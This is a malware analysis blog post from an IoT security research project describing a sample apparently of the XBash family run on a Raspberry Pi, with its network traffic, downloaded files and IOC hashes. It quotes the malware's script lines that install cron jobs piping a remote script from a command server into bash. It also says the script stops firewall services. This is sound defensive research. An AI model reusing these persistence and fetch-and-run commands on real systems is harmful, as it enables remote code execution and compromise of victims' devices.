This blog post was authored by María José Erquiaga (@MaryJo_E), on 2019-05-19

Sample Description

The sample was executed in a RapsberryPi from our IoT laboratory and the capture ID is 41-1.
The SHA256 of the sample that we executed in our laboratory is: d8040a64b88b4a738d333015ddd93a27187abb7584412df56633a7e7d12127f4.

As specified by VirusTotal analysis, this malware could be a CoinMiner, however, the name is not defined. The file name for the sample is mr.sh.

According to the blogpost written by Oleg Kolesnikov and Harshvardhan Parashar from Securonix this sample is in a group of malicious scripts that maintain persistence by creating a cronjob entry. According to the blogpost, the possible name for the malware we executed is XBash.

Another blogpost that describes XBash behavior mentione:

Xbash has ransomware and coinmining capabilities

According to this blogpost by Palo Alto researchers, XBash targeted Linux and Windows systems. XBash is a botnet, coinminer, ransomware that has self-propagation capabilities. On Linux, this malware has ransomware and botnet capabilities. For Windows systems, coinmining and self-propagating capabilities

Network behavior

This malware contacted a remote server with IP address 192.99.142.246 on port 8220/TCP, and downloaded several files by using GNU Wget agent and curl. The domain registered to that IP is http://www.ovh.com. According to Virus Total analysis, some of the files referring to this IP are: mr.sh, 2mr.sh, 3mr.sh. The curl request looks like this:

GET /mr.sh HTTP/1.1
Host: 192.99.142.246:8220 
User-Agent: curl/7.52.1
Accept: */*

The network behavior is repetitive; the infected device contacted the IP 192.99.142.246 on port 8220/TCP and downloaded in a span of 24 hours a total of 8646 files. The malware requests download the same files, named: mr.sh, 2mr.sh, 11, 1.so. The file names are the same, however, the files are different. For example, the file name 1.so was downloaded 4143 times. Two versions of the that were compared and turn out that there were different files and had different sha256 (see IoC section)

Downloaded files

Some one the downloaded files are:

• d8040a64b88b4a738d333015ddd93a27187abb7584412df56633a7e7d12127f4

• 8955a8f071c5de865cfe2c0f58bc3dfb2d6054d037361e4eb56a6dc02780f4a0

• ba74e757ff0a6d0d28f075bf6eef0feba6bb29da9e6e81afcdd12b8b49f69b88

• f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c

• 90dff83ca6519cbdb490013273c1301f93614c983e2015f3224700ac1f028a8f

According to VirusTotal, the name for those samples is not exact. Some of them are considered as a type of coin Miner, others as rootkit.

Analysis of the malware code executed

In the sample executed in the RaspberryPi, it is possible to see that the malware is creating files and changes permissions. Then, it stop the services iptables and SUSEfirewall. Also, it kills the processes sysxlj, jourxlv, sustes. Regarding the name of the services and proceses, it is possible to observe that this malware is clearly aiming linux based devices, specially those running SuseOS.

The malware creates crontab to download files (this behavior matches the network behavior and the behavior analyzed on the blogpost). The portion of the script doing this operation is the following:

echo -e "*/1 * * * * root (curl -s http://192.99.142.246:8220/mr.sh||wget -q -O - http://192.99.142.246:8220/mr.sh)|bash -sh\n##" > /etc/cron.d/root

echo -e "*/2 * * * * root (curl -s http://192.99.142.246:8220/mr.sh||wget -q -O - http://192.99.142.246:8220/mr.sh)|bash -sh\n##" > /etc/cron.d/apache

echo -e "*/30 * * * * (curl -s http://192.99.142.246:8220/mr.sh||wget -q -O - http://192.99.142.246:8220/mr.sh)|bash -sh\n##" > /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs

echo -e "* * * * * (curl -s http://192.99.142.246:8220/mr.sh||wget -q -O - http://192.99.142.246:8220/mr.sh)|bash -sh\n##" > /var/spool/cron/crontabs/root

mkdir -p /etc/cron.hourly

(curl -fsSL --connect-timeout 120 http://192.99.142.246:8220/11 -o /etc/cron.hourly/oanacroner1||http://192.99.142.246:8220/11 -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1

IOCs

• File name: mr.sh
  sha 256: d8040a64b88b4a738d333015ddd93a27187abb7584412df56633a7e7d12127f4

• File name: 11
  sha 256: 8955a8f071c5de865cfe2c0f58bc3dfb2d6054d037361e4eb56a6dc02780f4a0

• File name: 2mr.sh
  sha 256: ba74e757ff0a6d0d28f075bf6eef0feba6bb29da9e6e81afcdd12b8b49f69b88

• File name: 1.so
  sha 256: f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c

• File name 1.so:

  sha 256: 90dff83ca6519cbdb490013273c1301f93614c983e2015f3224700ac1f028a8f

Conclusions

In the network capture, this malware doesn’t take anymore actions at a network level. It basically downloads the listed files several times.

Acknowledge

This research was done as part of our ongoing collaboration with Avast Software in the Aposemat project. The Aposemat project is funded by Avast Software.

Thanks to Veronica Valeros for her help in the analysis and writing corrections.